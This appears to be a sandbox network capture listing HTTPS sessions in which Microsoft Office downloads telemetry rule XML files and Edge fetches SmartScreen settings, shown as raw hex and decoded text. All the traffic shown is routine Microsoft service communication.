                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                63192.168.2.54983713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 448
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 84cbfce0-201e-0071-26f6-26ff15000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210230Z-r197bdfb6b466qclztvgs64z10000000073g00000000entp
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                64192.168.2.54983913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210230Z-16849878b78smng4k6nq15r6s4000000074g0000000060cs
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                65192.168.2.54984113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: efea810d-301e-001f-2497-28aa3a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210231Z-r197bdfb6b4hsj5bywyqk9r2xw00000006x000000000fmuz
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                66192.168.2.5498424.152.133.84436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC698OUTPOST /api/browser/edge/data/settings/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 739
                                                                                                                                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoicExoanU5bEZlNlFDS0xPTTMxRXp2QT09IiwgImhhc2giOiI4eGpWTSsvRDlIZz0ifQ==
                                                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                If-None-Match: "2.0-0"
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC739OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 130439
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                                                                                                                                ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
                                                                                                                                                                                                                                                                                                                                Request-Context: appId=cid-v1:7b18f7b7-44a8-4212-9aac-12b29c628ff9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC16082INData Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16384INData Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16384INData Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16384INData Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16384INData Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16384INData Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                67192.168.2.54984413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4a7bd2a8-301e-0096-209e-26e71d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210231Z-16849878b78p49s6zkwt11bbkn000000053000000000y3sk
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
